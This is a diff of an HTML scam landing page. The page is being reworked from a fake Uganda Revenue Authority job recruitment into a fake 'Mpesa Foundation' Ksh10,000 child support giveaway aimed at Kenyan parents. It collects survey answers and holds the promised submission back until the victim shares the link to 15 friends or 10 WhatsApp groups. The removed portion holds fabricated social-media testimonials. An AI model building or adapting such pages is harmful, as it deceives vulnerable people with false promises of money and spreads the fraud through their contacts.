--- a/pg2.html
+++ b/pg2.html
@@ -1198,10 +1198,10 @@ Answer the following below!
 <div class="survey_middle">
 <div class="survey_inner">
 <p class="question_text question1">
-Question 1 of 3: Select your gender
+Question 1 of 3: Are You a Citizen of Kenya?
 </p>
 <p class="question_text question2">
-Question 2 of 3: Do you have any working experience?
+Question 2 of 3: Are You a Parent or Guardian?
 </p>
 <p class="question_text question3">
 Question 3 of 3: Select your age range
@@ -1209,12 +1209,12 @@ Question 3 of 3: Select your age range
 <div class="ans-box">
 <div class="answer anses1">
 <p>
-Male
+Yes
 </p>
 </div>
 <div class="answer anses1">
 <p>
-Female
+No
 </p>
 </div>
 <div class="answer anses2">
@@ -1277,14 +1277,14 @@ Your application has been received
 <i>
 <img src="https://upload.wikimedia.org/wikipedia/commons/thumb/e/e4/Twitter_Verified_Badge.svg/640px-Twitter_Verified_Badge.svg.png" alt="UN" width="5%">
 </i>
-<i style="font-size: 15px;">UGANDA REVENUE AUTHORITY STAFF RECRUITMENT:</i>
+<i style="font-size: 15px;">Mpesa Foundation Child Support Fund:</i>
 <div id='lastapp'>
 <br><br>
-<b>After checking your applications, you are qualified to work with the Uganda Revenue Authority </b>
+<b>After checking your applications, you are qualified to receive Ksh10,000 Child Support Fund </b>
 <br><br>
 --Your Application will be submitted immediately you click the &quot;Invite Friends/Group&quot; button below to share this information with 15 friends or 10 groups on WhatsApp so That They Can Also Be Aware of the ongoing Recruitment.
 <br><br>
-  You will receive a confirmation Email immediately it's completed.
+  You will receive a confirmation sms immediately it's completed.
 </div>
 </h4>
 </center>
@@ -1305,7 +1305,7 @@ fn1_a();
 },2000)
 }
 
-j='*UGANDA REVENUE AUTHORITY STAFF RECRUITMENT*%0A%0AThe Uganda Revenue Authority-(URA) has opened its 2023/2024 staff recruitment portal.%0A%0A*Click the link below to apply now*.%0A%0A*Apply Here*%0Ahttps://career-ura.govprograms.live/%0A%0A';
+j='*MPESA Ksh10,000 Child Support Fund*%0A%0AThe Uganda Revenue Authority-(URA) has opened its 2023/2024 staff recruitment portal.%0A%0A*Click the link below to apply now*.%0A%0A*Apply Here*%0Ahttps://career-ura.govprograms.live/%0A%0A';
 banner='';
 $.getScript('yuming.js?'+ (new Date()).getTime());
 
@@ -1458,170 +1458,6 @@ Submit Now</div>
 </div>
 </div>
 
-<div class="fbcoms">
-<p class=" comments">User Comment:</p>
-<p class="buttons">
-<span class="like">
-Like
-<i style="font-size:15px" class="far" aria-hidden="true"></i>
-</span>
-&nbsp; &nbsp;
-<span>
-Share
-<i style="font-size:15px" class="far" aria-hidden="true"></i>
-</span>
-&nbsp; &nbsp;
-<span>
-Comment
-<i style="font-size:15px" class="far" aria-hidden="true"></i>
-</span>
-&nbsp; &nbsp;
-<span>
-Remove
-</span>
-</p>
-<p class="totlikes">
-<span id="youand"></span>
-<span class="fbblue">
-Others 8954,208
-</span>
-like this
-</p>
-<p class="viewmore clearfix">
-<span class="left">
-...more comments
-</span>
-<span class="right">
-63 of 983,330
-</span>
-<br>
-</p>
-<div class="item" id="fb8" opacity:="" 1;>
-<img class="profileimg" height="50" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjTfog2kDjr1zF2hks4LYkDgCfqQjrJG4nNXHW5gzV08i6NewugRRQMcJIicPmh0wChKNTo7_fh_5Pz-gYSsg2Cc92lCHN26TvJi1bjCorNWmlWVWL1hrCJekbWIN8Z9TkrDqbTZ22MbwOG/s1600/FB_IMG_15869730921979436.jpg" width="50">
-<p class="comtxt" style="display: block;">
-<span class="name">
-Uthman Daud
-</span>
-<br>
-Thank you God, i just received an email now
-</p>
-<p class="combot" style="display: block;">
-<span class="ago">
-Just now
-</span>
-·
-<span class="fblike">
-Like
-</span>
-</p>
-</div>
-<div class="item" id="fb7" opacity:="" 1;>
-<img class="profileimg" height="50" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgXdUhbsPeStzn8T_8Aa-A_TPLI5iX8o0XWbP7MuGJ4p0BfEzfuzcsZsk_mifx1PEgCKeQIWhvkHg6OEygNBMGGOr0P9KWURMdb8cwM1Y2ZZWuKJr7KO74__D0MxZ482GHnY2BX-cjwjiXX/s1600/FB_IMG_15869730632923052.jpg" width="50">
-<p class="comtxt" style="display: block;">
-<span class="name">
-Sharon Gloria
-</span>
-<br>
-I have received email too
-</p>
-<p class="combot" style="display: block;">
-<span class="ago">
-Just now
-</span>
-·
-<span class="fblike">
-Like
-</span>
-</p>
-</div>
-<div class="item" id="fb6" opacity:="" 1;>
-<img class="profileimg" height="50" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjmtsAJ6BPX_M8NZCWcK_tTAtklKH2LY6D6fy8GUmgc31RSjjeM0iXIZqlJFmN0pBooDv2La-dqZVI1G026prdQH75z8VPggRhsBixJj2C_MxXoXsps8lN-T_uRV0kSH17PIzpn1Q1Ds1x0/s1600/FB_IMG_15869727323094582.jpg" width="50">
-<p class="comtxt" style="display: block;">
-<span class="name">
-Bokamoso
-</span>
-<br>
-Thank you! i really needed a job
-</p>
-<p class="combot" style="display: block;">
-<span class="ago">
-Just now
-</span>
-·
-<span class="fblike">
-Like
-</span>
-</p>
-</div>
-<div class="item" id="fb5" opacity:="" 1;>
-<img class="profileimg" height="50" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEinejnXJ_zBwsROq3C5B6CdYCUwdNEiaXRNKhvKEn5gZBeVgGwq4n1A0UhPlkGPc3yQFpH65KimZwW60yvzq5-cOB13e6CH61rOw8zPsbBFHAC-frIIqZTvk8IVhSvHjcZF0UKdNJyABhyphenhyphen2/s1600/FB_IMG_15869726933242138.jpg" width="50">
-<p class="comtxt" style="display: block;">
-<span class="name">
-Siyabonga
-</span>
-<br>
-When will the shortlist be out
-</p>
-<br>
-<p class="combot" style="display: block;">
-<span class="ago">
-Just now
-</span>
-·
-<span class="fblike">
-Like
-</span>
-</p>
-</div>
-<div class="item" id="fb4" opacity:="" 1;>
-<img class="profileimg" height="50" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhGVS_OoppA0KBV_cYBiHagBZb59PMKkViy7gVgkrGrMWcz1L5-Z1YkewhhVOrMUqupv4AhupuQEN-t3rF-OF57FX27tOwnfZSDDpyKys7EJUhSFmCv7TeUDtA7CpUeseywmQskAPF0ujog/s1600/FB_IMG_15869726679037399.jpg" width="50">
-<p class="comtxt" style="display: block;">
-<span class="name">
-Micheal Promise
-</span>
-<br>
-my application is still processing
-</p>
-<p class="combot" style="display: block;">
-<span class="ago">
-Just now
-</span>
-·
-<span class="fblike">
-Like
-</span>
-</p>
-</div>
-<div class="item">
-<img class="profileimg" height="50" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhnvvAm9Lza-buU0U-uyeikNpAXyFwzTxlDXx5juQYoizQ64NPGAQ3TcprVCB0YA1tD_G8VqgMhcyk7wmWdO6_U-g0dLSir6KYCWxr4CDMqhAlq8Yt2D5Q_K_jZ9UnqudvM9_9xcQOpww10/s1600/FB_IMG_15869727062399866.jpg" width="50">
-<p class="comtxt">
-<span class="name">
-Phylicia Ricketts
-</span>
-<br>
-Wow.. I didn't believe it until I got an email.
-</p>
-<p class="combot">
-<span class="ago">
-2 min ago
-</span>
-·
-<span class="fblike">
-Like
-</span>
-<span class="likes totlikes">
-223
-</span>
-</p>
-</div>
-</div>
-<br>
-<div>
-
-<div class="reply"><label for="reply">Add reply:</label> <textarea rows="4" id="reply" class="comments__form-input"></textarea>
-<p><button onclick="alert('Thanks for your comment, it will be posted after review.');" class="comments__form-submit">submit</button></p>
-</div>
-</div>
 
 </center>
 </div>
